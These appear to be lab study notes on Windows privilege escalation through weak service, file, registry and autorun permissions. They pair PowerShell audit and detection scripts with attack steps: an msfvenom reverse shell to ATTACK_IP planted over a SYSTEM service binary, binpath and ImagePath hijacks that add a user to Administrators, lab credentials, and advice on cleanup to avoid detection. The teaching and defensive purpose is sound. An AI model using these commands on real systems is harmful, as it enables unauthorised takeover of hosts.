Weak Permissions
Overview
Weak permissions are common in third-party software and in custom applications, far less so in the Windows components themselves. Most services run as NT AUTHORITY\SYSTEM, so any flaw that lets a standard user decide what a service executes is a direct path to complete control of the host. The vectors covered here are: file system ACLs on service binaries, the DACL on the service object itself, unquoted service paths, ACLs on service registry keys, and autorun binaries (which run as whichever user logs in, so they pay off when an administrator does).
Permissive File System ACLs
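Before the manual SharpUp and icacls steps in this section, an added PowerShell example (not code from the page or from HTB) that automates the same check: it resolves each service's executable from Win32_Service.PathName, reads the file's DACL with Get-Acl and reports ACEs that let a low-privileged principal or the current user overwrite it. The principal list, the write-rights mask and the function names are this example's own choices.

```powershell
# Added example, not from the HTB page: a PowerShell equivalent of the SharpUp /
# icacls checks in this section. Assumes PowerShell 5.1+ on Windows, run as the
# unprivileged user you are assessing.

# Principals every non-admin account is a member of (add your own groups with
# -ExtraPrincipals). Names are in the form Get-Acl reports them.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing or altering the file, or granting yourself more.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::WriteDac -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceExecutable {
    # Extract the executable from a PathName value, which may be quoted and may
    # carry arguments, e.g.  "C:\Program Files (x86)\PCProtect\SecurityService.exe"
    # or  C:\Windows\system32\svchost.exe -k netsvcs
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    $m = [regex]::Match($p, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $p.Split(' ')[0]
}

function Test-WeakFileAcl {
    # Return the Allow ACEs on $Path that grant write-equivalent rights to a
    # low-privileged principal or to the current user. Deny ACEs are not
    # evaluated here, so confirm a hit with icacls or accesschk -w before acting.
    param([Parameter(Mandatory)][string]$Path, [string[]]$ExtraPrincipals = @())
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $targets = $LowPrivPrincipals + $ExtraPrincipals + $me
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $targets -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0)
    }
}

# Walk every service and print the ones whose binary a low-privileged user can replace.
Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    if (-not $svc.PathName) { return }          # a few services report no path
    $exe  = Get-ServiceExecutable $svc.PathName
    $weak = Test-WeakFileAcl -Path $exe
    if ($weak) {
        [pscustomobject]@{
            Service    = $svc.Name
            StartMode  = $svc.StartMode
            State      = $svc.State
            Path       = $exe
            WritableBy = ($weak | ForEach-Object { "$($_.IdentityReference) [$($_.FileSystemRights)]" }) -join '; '
        }
    }
} | Format-Table -AutoSize
```

The StartMode and State columns matter as much as the path: a writable binary of a running service cannot be overwritten until the service stops, and starting it again needs SERVICE_START on the service object or a reboot.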
Service Binary Discovery
# Use SharpUp to identify vulnerable service binaries
.\SharpUp.exe audit
# Example output:
Name : SecurityService
DisplayName : PC Security Management Service
PathName : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
State : Stopped
StartMode : Auto

Permission Verification
# Check file permissions with icacls
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# Vulnerable example:
C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
                                                     Everyone:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
# (F) = Full Control, (I) = inherited. Users and Everyone can overwrite the binary,
# and because the ACEs are inherited from the PCProtect directory, everything in
# that directory is writable too.

Binary Replacement Attack
# Back up the original binary first. The service must be Stopped: a running
# service holds its image open and the copy over it fails.
copy "C:\Program Files (x86)\PCProtect\SecurityService.exe" SecurityService.exe.bak
# Generate the replacement. A plain exe is killed by the SCM after about 30 s
# because it never answers the start request (error 1053); msfvenom's
# "-f exe-service" format wraps the payload in a proper service binary instead.
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4444 -f exe > malicious.exe
# Replace the service binary
copy /Y malicious.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# Start the service for a SYSTEM shell. This needs SERVICE_START on the service
# (check with accesschk -c); without it, wait for a reboot, since StartMode is Auto.
sc start SecurityService

Weak Service Permissions
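The AccessChk output in this section summarises the service's security descriptor. An added PowerShell example (not from the page or from HTB) that decodes the SDDL string `sc sdshow` prints directly: it maps the two-letter SDDL right codes to their service-object meanings, flags Allow ACEs that give a low-privileged SID SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write right, and runs on a constructed SDDL. The tables and function names are the example's own.

```powershell
# Added example, not from the HTB page: interpret the security descriptor that
# `sc sdshow <service>` prints. The right codes follow the SDDL specification as
# applied to service objects; the sample SDDL at the end is constructed.

# Two-letter SDDL right codes and their meaning on a service object.
$ServiceRights = @{
    CC = 'SERVICE_QUERY_CONFIG';   DC = 'SERVICE_CHANGE_CONFIG'
    LC = 'SERVICE_QUERY_STATUS';   SW = 'SERVICE_ENUMERATE_DEPENDENTS'
    RP = 'SERVICE_START';          WP = 'SERVICE_STOP'
    DT = 'SERVICE_PAUSE_CONTINUE'; LO = 'SERVICE_INTERROGATE'
    CR = 'SERVICE_USER_DEFINED_CONTROL'
    SD = 'DELETE';                 RC = 'READ_CONTROL'
    WD = 'WRITE_DAC';              WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL';            GW = 'GENERIC_WRITE'
    GR = 'GENERIC_READ';           GX = 'GENERIC_EXECUTE'
}
# Well-known SID abbreviations that any unprivileged logon holds. Add a specific
# account SID (S-1-5-21-...) here when checking for the user you control.
$LowPrivSids = @{ WD = 'Everyone'; BU = 'BUILTIN\Users'; AU = 'Authenticated Users'; IU = 'INTERACTIVE' }
# Rights that allow hijacking the service: change its binary path, or rewrite
# its DACL/owner and then grant yourself everything. (WD in this list is the
# right WRITE_DAC, distinct from the SID abbreviation WD = Everyone above.)
$TakeoverRights = 'DC', 'WD', 'WO', 'GA', 'GW'

function ConvertFrom-ServiceSddl {
    # Parse the DACL ("D:...") of an SDDL string into one object per ACE.
    param([Parameter(Mandatory)][string]$Sddl)
    $dacl = [regex]::Match($Sddl, 'D:(?<flags>[A-Z]*)(?<aces>(?:\([^)]*\))+)')
    if (-not $dacl.Success) { return }
    foreach ($m in [regex]::Matches($dacl.Groups['aces'].Value, '\(([^)]*)\)')) {
        # ACE string: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
        $f = $m.Groups[1].Value.Split(';')
        $codes = @($f[2])                                   # hex mask form, e.g. 0x1F01FF
        if ($f[2] -notlike '0x*') { $codes = @([regex]::Matches($f[2], '..') | ForEach-Object { $_.Value }) }
        $type = switch ($f[0]) { 'A' { 'Allow' } 'D' { 'Deny' } default { $f[0] } }
        [pscustomobject]@{
            Type   = $type
            Sid    = $f[5]
            Codes  = $codes
            Rights = @($codes | ForEach-Object { if ($ServiceRights.ContainsKey($_)) { $ServiceRights[$_] } else { $_ } })
        }
    }
}

function Test-WeakServiceSddl {
    # Return the Allow ACEs that give a low-privileged SID a takeover right.
    param([Parameter(Mandatory)][string]$Sddl)
    ConvertFrom-ServiceSddl $Sddl | Where-Object {
        $_.Type -eq 'Allow' -and $LowPrivSids.ContainsKey($_.Sid) -and
        @($_.Codes | Where-Object { $TakeoverRights -contains $_ }).Count -gt 0
    } | ForEach-Object {
        [pscustomobject]@{ Principal = $LowPrivSids[$_.Sid]; Rights = ($_.Rights -join ',') }
    }
}

# Constructed sample: the usual SYSTEM/Administrators/Interactive ACEs plus one
# ACE that hands Authenticated Users full control, as a careless installer might.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
          '(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)' +
          'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Test-WeakServiceSddl $sample | Format-List

# Live use against a real service (sc.exe prints the SDDL across several lines):
# Test-WeakServiceSddl ((sc.exe sdshow WindscribeService) -join '')
```

In the sample, the Interactive ACE only carries query and interrogate rights and is ignored; the Authenticated Users ACE carries DC (SERVICE_CHANGE_CONFIG) among others and is reported, which is exactly the condition the binpath modification below depends on.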
Service Permission Enumeration
# Check service permissions with AccessChk
accesschk.exe /accepteula -quvcw WindscribeService
# Vulnerable output:
WindscribeService
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS   # full control, including SERVICE_CHANGE_CONFIG, for every authenticated user

Binary Path Modification Attack
# Check current local admin group
net localgroup administrators
# Point the service at a command instead of a binary; it will run as the
# service account (here SYSTEM). The documented sc syntax puts a space after
# binpath= (binpath= "cmd /c ..."); use that form if this one is rejected.
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
# Stop and start the service so the SCM launches the new "binary". This needs
# SERVICE_STOP and SERVICE_START on the service; SERVICE_ALL_ACCESS covers both.
sc stop WindscribeService
sc start WindscribeService
# sc start typically fails with error 1053 because cmd never reports back to
# the SCM; the command has still run. Verify:
net localgroup administrators
# htb-student should now be listed

Service Cleanup
# Restore the original binary path. Record the exact original value with
# "sc qc WindscribeService" before modifying it: the original is normally
# quoted, and restoring it unquoted as below leaves an unquoted-path weakness
# behind (wrap the path in escaped quotes, \"...\", inside the binpath value).
sc config WindscribeService binpath="C:\Program Files (x86)\Windscribe\WindscribeService.exe"
# Start service normally
sc start WindscribeService

Unquoted Service Path
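An added PowerShell example (not from the page or from HTB) for the discovery and execution-order analysis in this section. For each auto-start service with an unquoted, space-containing path it lists the executables Windows would try before the intended one, and instead of reading DACLs it tests effective access by creating and deleting an empty probe file in each directory. The function names and the probe-file approach are the example's own.

```powershell
# Added example, not from the HTB page. Run as the low-privileged user; the only
# files written are zero-byte probes that are removed immediately.

function Get-UnquotedPathCandidates {
    # CreateProcess splits an unquoted command line at each space and tries
    # "<prefix>.exe" for every prefix, left to right. Yield those candidates
    # (the intended executable itself is not a candidate to plant).
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return }                      # quoted: not affected
    $m = [regex]::Match($p, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    $exe = if ($m.Success) { $m.Groups[1].Value } else { $p }
    $parts = $exe.Split(' ')
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    # Effective-access test: create and delete an empty file. Unlike reading the
    # DACL this honours Deny ACEs, group membership and the C:\ root quirk where
    # standard users may create folders but not files.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ('probe-{0}.tmp' -f [guid]::NewGuid())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

# Audit every auto-start service with an unquoted, space-containing path.
Get-CimInstance Win32_Service |
    Where-Object { $_.PathName -and $_.StartMode -eq 'Auto' } |
    ForEach-Object {
        $svc = $_
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            [pscustomobject]@{
                Service   = $svc.Name
                Candidate = $cand
                Writable  = Test-DirectoryWritable (Split-Path -Parent $cand)
            }
        }
    } | Format-Table -AutoSize
```

Get-UnquotedPathCandidates can also be called by hand on a PathName string taken from `sc qc` to see the search order without touching the file system; a row with Writable = True is the one worth planting a binary in, subject to the same SERVICE_START or reboot requirement as the other vectors.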
Path Discovery
# Find auto-start services whose path is unquoted and not under C:\Windows.
# (wmic is deprecated and absent from recent Windows builds; the PowerShell
# query under Alternative Techniques returns the same data.)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Example vulnerable path:
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

Execution Order Analysis
# Without quotes, CreateProcess cannot tell where the executable ends and its
# arguments begin, so it splits the string at each space and tries, in order:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\System.exe
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
# Limitation: by default a standard user cannot create files in C:\ (only
# folders) or anywhere under Program Files, so the first three candidates need
# a directory with weakened ACLs, e.g. an application installed outside Program
# Files or a vendor directory that grants Users write access. Starting the
# service afterwards has the same SERVICE_START-or-reboot requirement as above.

Permissive Registry ACLs
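An added PowerShell example (not from the page or from HTB) of the AccessChk registry check in this section: it walks HKLM\SYSTEM\CurrentControlSet\Services, reports keys whose DACL lets a low-privileged principal or the current user write values, and shows the ImagePath that such a write would replace. The principal list, the rights mask and the function name are the example's own.

```powershell
# Added example, not from the HTB page. Run as the unprivileged user.

$LowPrivPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
# SetValue rewrites ImagePath directly; ChangePermissions and TakeOwnership let
# you grant yourself SetValue; CreateSubKey is included because subkeys such as
# Parameters are also read at service start.
$KeyWriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
                  [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                  [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                  [System.Security.AccessControl.RegistryRights]::TakeOwnership

function Get-WritableServiceKey {
    param(
        [string]$Root = 'HKLM:\SYSTEM\CurrentControlSet\Services',
        [string[]]$ExtraPrincipals = @()
    )
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $targets = $LowPrivPrincipals + $ExtraPrincipals + $me
    Get-ChildItem -Path $Root -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }                     # keys whose DACL we cannot read
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $targets -contains $_.IdentityReference.Value -and
            (([int]$_.RegistryRights -band [int]$KeyWriteRights) -ne 0)
        }
        if ($weak) {
            [pscustomobject]@{
                Service    = $key.PSChildName
                ImagePath  = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                WritableBy = ($weak | ForEach-Object { "$($_.IdentityReference) [$($_.RegistryRights)]" }) -join '; '
            }
        }
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
```

As with the file check, only Allow ACEs are inspected; a Deny ACE for the same principal would override, so confirm a hit with accesschk -kw before relying on it.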
Registry Service Key Enumeration
# Check for weak registry ACLs
accesschk.exe /accepteula "htb-student" -kvuqsw hklm\System\CurrentControlSet\services
# Vulnerable example:
RW HKLM\System\CurrentControlSet\services\ModelManagerService
        KEY_ALL_ACCESS

Registry Modification Attack
# Rewrite the ImagePath value the SCM reads at service start (needs SetValue on the key)
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\htb-student\malicious.exe"
# The change takes effect at the next start: restart the service if you hold
# SERVICE_STOP/SERVICE_START on it, otherwise wait for a reboot (auto-start
# services) or for an administrator to restart it. The write goes straight to
# the registry, not through the SCM, so the service object's DACL plays no part;
# only the key ACL matters.

Modifiable Registry Autorun Binary
Autorun Program Discovery
# Check startup programs
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
# Example autorun locations:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (System-wide)
- HKU\S-1-5-21-...\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (User-specific)

Autorun Exploitation
# Check permissions on the autorun binary (same icacls/accesschk check as for service binaries)
icacls "C:\Program Files (x86)\Windscribe\Windscribe.exe"
# If writable, replace it with a malicious binary
# It runs in the context of whichever user logs in next, with that user's
# privileges, so the payoff comes when an administrator logs on (under UAC
# that is still the filtered medium-integrity token unless the process elevates)

HTB Academy Lab Solution
Lab Environment
Credentials: htb-student:HTB_@cademy_stdnt!
Access Method: RDP
Objective: Escalate privileges using weak permissions
Flag Location:
C:\Users\Administrator\Desktop\WeakPerms\flag.txt
Complete Walkthrough
# 1. RDP connect and enumerate services
.\SharpUp.exe audit
# 2. Check for weak service permissions
accesschk.exe /accepteula -quvcw [SERVICE_NAME]
# 3. Identify exploitable service (e.g., WindscribeService)
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
# 4. Execute privilege escalation
sc stop WindscribeService
sc start WindscribeService
# 5. Verify admin access
net localgroup administrators
# 6. Read the flag. Group membership is applied at logon, so disconnect and
#    log in again over RDP, then open an elevated (Run as administrator) prompt;
#    the Administrator profile is not readable from a medium-integrity shell
type C:\Users\Administrator\Desktop\WeakPerms\flag.txt
# 7. Clean up (optional)
sc config WindscribeService binpath="[ORIGINAL_PATH]"
net localgroup administrators htb-student /delete

Alternative Techniques
PowerShell Service Enumeration
# List auto-start services with their paths: the raw material for the unquoted-path
# and file-ACL checks, not a permission test by itself. Get-CimInstance is the
# supported replacement for the deprecated Get-WmiObject.
Get-WmiObject win32_service | Select-Object Name, DisplayName, PathName, StartMode | Where-Object {$_.StartMode -eq "Auto"}

Manual Permission Checks
# Check file permissions
icacls "C:\Program Files\Application\service.exe"
# Check service permissions (prints the SDDL; DC in an Allow ACE for AU, BU or WD
# means SERVICE_CHANGE_CONFIG for low-privileged users)
sc sdshow [SERVICE_NAME]
# Check registry contents (values only; the key ACL needs accesschk -k or Get-Acl)
reg query HKLM\System\CurrentControlSet\Services\[SERVICE] /s

Detection & Defense
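An added PowerShell example (not from the page or from HTB) showing the detection side of the techniques above as code rather than a list of event IDs. It runs over constructed sample records shaped like normalised Windows events, and a small converter turns real Get-WinEvent records into the same shape. The rule names, the output fields and the sample values are the example's own; the event IDs and EventData field names are the real ones.

```powershell
# Added example, not from the HTB page. Relevant events: System 7040 (start
# type changed) and 7045 (service installed), Sysmon 13 (registry value set;
# needs a Sysmon rule covering Services\*\ImagePath), Security 4732 (member
# added to a local group).

function ConvertFrom-WinEvent {
    # Turn a Get-WinEvent record into Id / Provider / Data, where Data maps each
    # EventData <Data Name="..."> element to its text.
    param([Parameter(Mandatory, ValueFromPipeline)]$LogRecord)
    process {
        $xml  = [xml]$LogRecord.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { if ($d.Name) { $data[$d.Name] = $d.'#text' } }
        [pscustomobject]@{ Id = $LogRecord.Id; Provider = $LogRecord.ProviderName; Time = $LogRecord.TimeCreated; Data = $data }
    }
}

function Find-ServiceTampering {
    # Emit one alert object per record that matches a tampering pattern.
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $d = $Record.Data
        switch ($Record.Id) {
            13 {
                # Sysmon RegistryEvent: an ImagePath under the Services hive was set.
                # sc config talks to the SCM over RPC, so the writing Image is
                # services.exe, not sc.exe; correlate with a process-creation event
                # for "sc config ... binpath=" to find the actual operator.
                if ($Record.Provider -eq 'Microsoft-Windows-Sysmon' -and
                    $d.TargetObject -match '\\Services\\[^\\]+\\ImagePath$') {
                    $v = [string]$d.Details
                    $shell   = $v -match '(?i)\b(cmd|powershell|pwsh)(\.exe)?\b'
                    $outside = $v -notmatch '(?i)^"?[A-Z]:\\(Program Files( \(x86\))?|Windows)\\'
                    if ($shell -or $outside) {
                        [pscustomobject]@{ Rule = 'ImagePath rewritten'; Subject = $d.TargetObject; Detail = $v; By = $d.Image }
                    }
                }
            }
            7040 { [pscustomobject]@{ Rule = 'Service start type changed'; Subject = $d.param1; Detail = "$($d.param2) -> $($d.param3)"; By = 'Service Control Manager' } }
            7045 { [pscustomobject]@{ Rule = 'New service installed'; Subject = $d.ServiceName; Detail = $d.ImagePath; By = $d.AccountName } }
            4732 {
                if ($d.TargetUserName -eq 'Administrators') {
                    [pscustomobject]@{ Rule = 'Member added to Administrators'; Subject = $d.MemberSid; Detail = $d.MemberName; By = $d.SubjectUserName }
                }
            }
        }
    }
}

# Constructed sample records (not real telemetry): the binpath hijack from this
# page, the legitimate restore afterwards, and the resulting group change.
$sample = @(
    [pscustomobject]@{ Id = 13; Provider = 'Microsoft-Windows-Sysmon'; Data = @{
        Image        = 'C:\Windows\System32\services.exe'
        TargetObject = 'HKLM\System\CurrentControlSet\Services\WindscribeService\ImagePath'
        Details      = 'cmd /c net localgroup administrators htb-student /add'
    } }
    [pscustomobject]@{ Id = 13; Provider = 'Microsoft-Windows-Sysmon'; Data = @{
        Image        = 'C:\Windows\System32\services.exe'
        TargetObject = 'HKLM\System\CurrentControlSet\Services\WindscribeService\ImagePath'
        Details      = '"C:\Program Files (x86)\Windscribe\WindscribeService.exe"'   # restore: not flagged
    } }
    [pscustomobject]@{ Id = 4732; Provider = 'Microsoft-Windows-Security-Auditing'; Data = @{
        TargetUserName  = 'Administrators'; MemberName = '-'
        MemberSid       = 'S-1-5-21-1004336348-1177238915-682003330-1001'   # constructed SID
        SubjectUserName = 'WINHOST$'                                        # SYSTEM acts as the machine account
    } }
)
$sample | Find-ServiceTampering | Format-Table -AutoSize

# Live use (Sysmon log shown; repeat with LogName = 'System' and 'Security'):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 } |
#     ConvertFrom-WinEvent | Find-ServiceTampering
```

Two points the sample is built to show: the hijack and the restore are the same event type from the same process, so the content of Details (a shell, or a path outside Program Files and Windows) is what separates them; and a `net localgroup` run from a SYSTEM service shows up in 4732 with the machine account as subject, which is a strong signal on its own.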
Detection Indicators
# Monitor for:
- Service start-type changes (System log, Service Control Manager Event ID 7040) and new service installations (7045, Security 4697)
- ImagePath rewrites under HKLM\SYSTEM\CurrentControlSet\Services (Sysmon Event ID 13, or Security 4657 with a SACL on the keys); sc config binpath= does not raise 7040
- Hash or timestamp changes of service binaries under Program Files (file integrity monitoring)
- Additions to the local Administrators group (Security 4732), especially when the subject is SYSTEM or a service account
- services.exe spawning cmd.exe, powershell.exe or binaries from user-writable paths (Sysmon Event ID 1, Security 4688)

Defensive Measures
# Security hardening:
- Run services under the least-privileged account that works (virtual service accounts or gMSAs rather than SYSTEM) so a hijacked service yields less
- Audit ACLs on service binaries, their directories and their registry keys after every third-party install; no Write, Modify or Full Control for Users, Everyone or Authenticated Users
- Do not grant SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER on service objects to non-administrators
- Quote every service path that contains spaces
- Alert on service configuration and registry changes (see Detection Indicators)
- Enforce application control (WDAC or AppLocker) so a replaced or planted binary does not execute

Key Takeaways
Third-party software commonly has weak permissions
Service binaries are high-value targets (SYSTEM privileges)
Multiple attack vectors - files, services, registry, autorun
AccessChk and SharpUp are essential enumeration tools
Cleanup important to avoid detection and maintain operations
Weak permissions exploitation leverages misconfigurations in file systems, services, and registry to achieve privilege escalation.